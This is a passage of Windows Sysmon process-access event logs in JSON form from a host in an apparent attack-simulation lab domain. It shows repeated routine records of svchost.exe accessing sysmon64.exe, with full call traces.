07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1913,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.283\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.283","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1914,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.283\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.283","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1915,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.283\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.283","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1916,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.283\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.283","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1917,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.283\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.283","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1918,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.283\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.283","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1919,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.283\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.283","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1920,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.283\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.283","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
